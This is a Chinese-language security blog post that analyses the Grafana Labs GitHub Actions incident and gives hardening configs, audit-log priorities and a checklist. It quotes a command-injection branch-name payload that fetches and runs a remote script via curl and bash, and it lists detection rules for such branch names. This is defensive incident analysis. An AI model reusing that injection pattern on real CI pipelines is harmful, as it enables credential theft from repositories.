2025 年 4 月 26 日,Grafana Labs 安全团队收到一枚 canary token 触发告警,随即启动应急响应。一支未授权行为者利用公开仓库中一个 GitHub Actions 工作流的错误配置,经由分叉、恶意分支命名与远程脚本执行,完成凭证窃取并访问了四份私有仓库。全流程被 Grafana 自有的 Loki 日志分析平台捕获,调查于 5 月 12 日完成,结论为生产系统与客户数据未受影响。本文以这份公开的事后审查(Post-Incident Review,下称 PIR)为锚,聚焦「内部代码托管平台的 IAM 边界与审计日志缺失」这一工程切面,提炼可落地的配置参数与监控策略。
1. 攻击链还原:pull_request_target 的信任传递陷阱
事件核心是一个名为 pr-patch-check-event.yml 的 GitHub Actions 工作流。该工作流使用了 pull_request_target 触发器而非更安全的 pull_request,这一选择直接导致攻击者获得在可信执行环境中运行代码的机会。以下还原完整攻击链:
- 分叉仓库:攻击者分叉 Grafana 公开仓库,在自身分支上推送恶意内容。
- 分支命名注入:攻击者将分支命名为包含命令注入 payload 的字符串,例如
('child_process').exec('curl$(IFS)-pathtofile$(IFS)bash'),利用工作流中对分支名的处理缺陷触发远程脚本执行。 - 环境变量暴露:恶意脚本在可信 CI 环境中被触发,提取所有工作流可见的环境变量(包括凭证)。
- 加密外泄与痕迹清除:窃取的凭证使用攻击者提供的公钥加密后外传,随即删除分叉以逃避检测。
- 凭证重用:攻击者使用窃取的 GitHub App Token 访问四份私有仓库。
关键教训不在于「攻击者聪明」,而在于 pull_request_target 被赋予了超出其安全模型的信任级别。该触发器设计用于允许仓库维护者在来自分叉的 PR 上运行代码(例如添加评论标签),但其执行上下文继承了目标仓库的写权限与 secrets 访问权。在持续集成场景下,这一设计决策等同于将生产凭证暴露在潜在恶意的外部输入面前。
工程参数:GitHub Actions 工作流中 pull_request_target 触发器应仅在确实需要目标仓库写权限时启用,且必须配合以下约束:
# 工作流权限最小化配置(GitHub Enterprise Cloud)
permissions:
contents: read
pull-requests: write # 仅在确实需要标签/评论时开启
# 禁止在 pull_request_target 中使用 GITHUB_TOKEN 以外的 secrets
# 使用独立的服务账号 token 并设置短过期时间
2. IAM 边界失效:凭证生命周期管理的结构性缺陷
Grafana PIR 明确指出,受影响工作流暴露的凭证包含「非活跃凭证」,但仍需额外访问权限才能被利用。这一描述揭示了一个更深层的 IAM 设计缺陷:CI/CD 环境中的凭证缺乏按执行上下文划分的隔离机制。
2.1 问题:Secrets 与执行环境的静态绑定
传统 CI/CD 配置将 secrets 以环境变量形式注入工作流,无论任务实际需要的最小权限如何,所有 secrets 对所有步骤可见。pr-patch-check-event.yml 中一个仅需「检查 PR 事件类型」的步骤,却继承了完整仓库写权限与所有已配置的 secrets。
2.2 缓解:分隔式保险库与短生命周期 Token
Grafana 事后披露的修复措施之一是将凭证迁移至「分隔式保险库」(compartmentalized vaults),并实施「短生命周期 Token」。这是从「静态 secrets 注入」向「按需动态注入」范式的转变,对应工程参数如下:
| 维度 | 修复前 | 修复后 |
|---|---|---|
| Secret 作用域 | 全局注入,工作流所有步骤共享 | 按步骤 / Job 定义独立 Secret,遵循最小权限 |
| Token 有效期 | 长期有效或无过期策略 | 滚动 Token,OIDC 联邦动态签发,有效期 ≤ 1 小时 |
| 访问控制 | 组织级别 Secrets 库统一管理 | 按仓库 / 按工作流类型划分的独立 Vault |
| 轮换机制 | 事件触发后手动轮换 | Vault 自动轮换 + Token 撤销联动 |
工程参数:推荐使用 GitHub 的 OpenID Connect (OIDC) 联合认证,替换静态 Personal Access Token(PAT):
# GitHub Actions OIDC 信任策略(部署在云厂商 IAM 中)
permissions:
id-token: write # 启用 OIDC 令牌请求
contents: read
jobs:
deploy:
steps:
- name: Request temporary credentials
uses: aws-actions/configure-aws-credentials@v4
with:
role-to-assume: arn:aws:iam::ACCOUNT:role/GitHubActionsRole
aws-region: us-east-1
该模式下凭证按需动态签发,无长期存储于 CI 环境中的 secrets,从根本上消除了「窃取 CI secrets → 访问私有资源」的攻击路径。
3. 审计日志缺口:内部代码托管平台的可观测性设计
Grafana 在 PIR 中披露,事件发现的核心驱动力是 canary token 告警,而非例行的访问审计。这一细节折射出大多数内部代码托管平台的一个共性问题:访问行为监控依赖外部告警机制,而非平台内建的审计日志。
3.1GitHub 原生审计日志的覆盖盲区
GitHub Enterprise 的审计日志(Audit Log)默认记录如下内容:
- 仓库访问(clone/push/fork)
- 权限变更(成员添加 / 移除)
- 工作流执行记录(触发时间、状态)
- Secrets 访问(在某些配置下)
但以下行为在默认配置下不具备结构化日志:
- 工作流内环境变量读取操作(由 Runner 进程持有,GitHub 不直接暴露)
- 从分叉 PR 中触发的
pull_request_target执行上下文切换 - 非活跃凭证被访问的时间窗口(攻击者可能在凭证轮换前等待时机)
Grafana 使用 Grafana Loki 分析 GitHub Actions 日志,说明其在 GitHub 原生能力之外构建了额外的可观测性层。这对于高安全要求的组织是必要的,因为原生审计日志的保留策略(默认 90 天)与查询灵活性不足以支撑深度事件调查。
3.2 可落地的审计日志配置参数
以下为内部代码托管平台应优先建设的审计能力清单,按优先级排序:
P0—— 必须覆盖
- 所有
pull_request_target触发的执行事件(含触发者分支名、提交 SHA、执行时长) - Secrets/Vault 访问日志(按请求主体记录,不记录 secret 值本身)
- Token 签发与撤销事件(含 TTL、受信任委托方)
P1—— 推荐覆盖
- Git 操作(非
git clone的低频操作,如git diff、git log的 API 调用) - Webhook 投递失败与重试记录
- 权限变更审批链(谁审批、何时生效)
P2—— 可选增强
- 基于分支名的行为异常检测(长字符串、特殊字符、Base64 编码等特征)
- 非活跃时段的 CI 执行统计
- 多仓库联合访问模式(单 Token / 服务账号访问的仓库数量阈值告警)
3.3 攻击时间窗口的可检测性分析
Wiz 披露的攻击链中,攻击者在获取凭证后延迟使用,符合高级持续性威胁(APT)的潜伏特征 —— 先窃取凭证,等待合适时机再使用,以规避短期的异常检测阈值。这种模式要求审计系统具备跨时间窗口的行为关联能力,而非仅依赖单次操作的阈值告警。
工程参数:建议部署以下检测规则(日志平台查询语法,以 Grafana Loki 为例):
# 检测 pull_request_target 触发器中异常的分支名模式
{service="github-actions"} | json | branch_name=~".*[\$\(\)\`].*"
| line_format "{{.job_name}} triggered by suspicious branch: {{.branch_name}}"
# 检测 Token 被用于访问超出基线的仓库数量
count by (actor) (
{event="repo_access"}
| unwrap github_token_id
| __error__="None"
) > 10
# 检测非活跃时段(UTC 00:00–06:00)的 CI 写操作
{service="github-actions", action="push"} | json
| hour_of_day >= 0 and hour_of_day < 6
| line_format "{{.actor}} performed push at {{.timestamp}}"
4. 供应链信任模型:从「信任所有自动化」到「验证每次变更」
Grafana 事件本质上是一次供应链信任模型的失效。组织对 CI/CD 自动化的信任远超对其安全态势的了解 —— 工作流被默认可信,直到发生事故才重新评估。这与外部包生态的风险模式(昨天已覆盖)形成对称:外部包风险是「引入不可信代码」,内部 CI/CD 风险是「将信任扩展到不可控上下文」。
4.1 工作流安全静态分析工具的三件套
Grafana PIR 披露的三项关键安全工具引入:
- Gato-X:识别不安全的 GitHub Actions 模式(如 pull_request_target 滥用)
- Zizmor:工作流 YAML 静态分析,检测权限过度授予与不安全配置
- TruffleHog:凭证扫描,确保代码库中无泄露的秘密
这三件工具分别对应「拓扑分析」「配置审计」「内容审计」三个层面,构成工作流安全的最小必要工具集。
4.2 分支隔离与开源 / 私有仓库网络隔离
Grafana 事后披露的另一项关键修复是「将开源 GitHub 组织与私有仓库分离」。这一决策的技术含义是:在代码托管层面切断公开仓库与内部资产的直接信任传递路径。
工程参数:以下配置实现了这一隔离模型:
# GitHub Enterprise: 组织级别的安全策略
# 限制公开仓库的工作流权限
permissions_policy:
workflows:
default_permissions: read-only
secrets:
restrict_in_public_repos: true
# 禁止公开仓库的工作流访问内部私有仓库内容
# 通过 GitHub App 权限控制实现仓库间的访问授权矩阵
开源项目与内部项目的 CI/CD 身份体系应完全解耦 —— 开源 CI 使用专用的、权限受限的 GitHub App;内部系统使用独立的云厂商 IAM Role,不共享同一凭证来源。
5. 可落地的工程检查清单
以下清单基于 Grafana PIR 与供应链安全最佳实践提炼,适用于所有使用 GitHub Actions 或同类 CI/CD 平台进行代码托管的组织:
身份与访问管理(IAM)
- 所有工作流文件配置
permissions:为最小必要范围(contents: read优先) - 替换静态 PAT 为 OIDC 联合认证,实现动态短生命周期 Token
- 对
pull_request_target触发器进行逐仓库审计,评估是否可替换为pull_request - Secrets 存储迁移至分隔式 Vault,按工作流类型独立配置访问策略
- 禁止在公开仓库中使用内部专属 Secrets(通过
permissions_policy强制)
审计与可观测性
- 部署
pull_request_target触发的结构化日志(含分支名、执行上下文) - 配置 Token 签发与撤销的完整审计链路
- 部署跨时间窗口的行为关联检测(延迟使用的攻击路径)
- 集成 Gato-X + Zizmor + TruffleHog 至 CI/CD 的强制门禁阶段(Gate)
事件响应
- 建立 Canary Token 告警机制作为主动检测手段
- 制定凭证轮换 Playbook,覆盖「检测到异常 → 立即撤销 → 验证无影响」全流程
- 每季度执行「灾难恢复演练」,验证无修改的完整性证明(像 Grafana 用 IaC + 容器校验所做的那样)
供应链纵深
- 开源组织与私有仓库使用独立的 CI 身份体系
- 所有容器镜像建立 SBOM 并校验签名
- 工作流依赖项(Action 版本)纳入依赖审查流程
6. 结语:信任传递的边界在哪里
Grafana Labs 的这份 PIR 是近年来公开的最详尽的 CI/CD 安全事件事后审查之一。它的价值不仅在于披露了技术细节,更在于展示了一个高安全意识组织如何从「自动化即信任」到「验证每次变更」的文化转变。
对于工程团队而言,最核心的认知跃迁是:GitHub Actions 的执行上下文不是代码执行环境,而是一个具有生产系统权限的 API 客户端。任何外部输入(分叉 PR、分支名、Webhook payload)都应被视为潜在的攻击面。pull_request_target 不是 bug,它是一个需要在明确理解其安全模型后才能使用的工具 —— 而大多数团队在使用它时,并未意识到自己正在将生产凭证的访问权委托给一个不受控的执行上下文。
当信任的边界不清晰时,审计就无法完整;当审计不完整时,异常就无法被发现。Grafana 的事件之所以被成功检测,核心驱动力不是平台内建的防护,而是主动部署的 canary token。这提醒我们:安全内建(security built-in)优于安全外加(security bolted-on)—— 下一次供应链攻击未必会有如此明显的告警信号。
参考资料
- Grafana Labs, "Grafana security update: post-incident review for GitHub workflow vulnerability and what's next" (2025-05-16): https://grafana.com/blog/grafana-security-update-post-incident-review-for-github-workflow-vulnerability-and-whats-next/
- Wiz Threat Intelligence, "Grafana GitHub Action attempted supply chain attack": https://threats.wiz.io/all-incidents/grafana-github-action-attempted-supply-chain-attack
内容声明:本文无广告投放、无付费植入。
如有事实性问题,欢迎发送勘误至 i@hotdrydog.com。